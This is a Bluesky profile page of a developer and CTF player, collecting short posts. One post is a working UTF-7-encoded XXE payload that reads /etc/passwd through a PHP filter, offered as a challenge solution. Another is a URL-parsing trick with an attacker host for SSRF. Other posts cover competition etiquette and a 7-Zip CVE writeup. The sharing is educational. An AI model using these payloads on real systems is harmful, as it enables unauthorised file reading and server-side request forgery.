martcl's Avatar

martcl

@martcl.bsky.social

Developer, CTF player and golang enjoyer.

39 Followers  |  196 Following  |  9 Posts  |  Joined: 28.11.2024  |  1.6107

Latest posts by martcl.bsky.social on Bluesky

<?xml version="1.0" encoding="UTF-7"?>+ADwAIQ-DOCTYPE data +AFsAPAAh-ENTITY xxe+ACA-SYSTEM +ACI-php://filter/convert.base64-encode/resource+AD0-/etc/passwd+ACIAPgBdAD4-+ADw-data+AD4APA-title+AD4-+ACY-xxe+ADsAPA-/title+AD4APA-/data+AD4

22.03.2025 20:12 β€” πŸ‘ 3    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Sorry if I'm interpenetrating wrong or ruining the competition. I really enjoined the article and learned something new! πŸ‘‘ My PoC uses UTF-7 and PHP filters to read arbitrary files. The PHP filters could probably be used to get RCE, but that is too long for a blsky post!

22.03.2025 20:12 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

I interoperate the words "post your solution" and "reply" as it's OK to share a solution publicly before the competition is finished. Just feels a bit strange πŸ˜…

22.03.2025 19:57 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

With "reply", do you mean comment our solution here?

22.03.2025 19:48 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

Better to just use the browser. No updates;)

11.03.2025 18:59 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

… Depending on how the function is used, you would need to add one more colon to my original url to get a ssrf.

05.03.2025 14:16 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

This is just url parsing. The vuln comes from how you use the function I guess. ssrf could definitely become an issue here since hostname assumption is wrong

05.03.2025 14:12 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 2    πŸ“Œ 0

regex <3 `https://example.com:pass@attacker.example.com`

04.03.2025 22:28 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0
Preview
GitHub - martcl/nrk-former: LΓΈser NRK former med A* LΓΈser NRK former med A*. Contribute to martcl/nrk-former development by creating an account on GitHub.

NRK former er et kult spill! Jeg har brukt de siste dagene pΓ₯ Γ₯ lage et program for Γ₯ finne den teoretiske beste poengsummen det er mulig Γ₯ fΓ₯. 🫣 SΓ₯ hvis noen en gang sitter og lurer pΓ₯, hvordan Norges beste fikk sΓ₯ bra score;

github.com/martcl/nrk-f...

30.11.2024 10:51 β€” πŸ‘ 7    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0
Preview
GitHub - TheN00bBuilder/cve-2024-11477-writeup: CVE-2024-11477 7Zip Code Execution Writeup and Analysis CVE-2024-11477 7Zip Code Execution Writeup and Analysis - TheN00bBuilder/cve-2024-11477-writeup

Spent some time researching #CVE-2024-11477, the new #7zip CVE and made a writeup about my work on it. Let me know what you think! github.com/TheN00bBuild...

29.11.2024 06:33 β€” πŸ‘ 20    πŸ” 5    πŸ’¬ 1    πŸ“Œ 1

@martcl is following 20 prominent accounts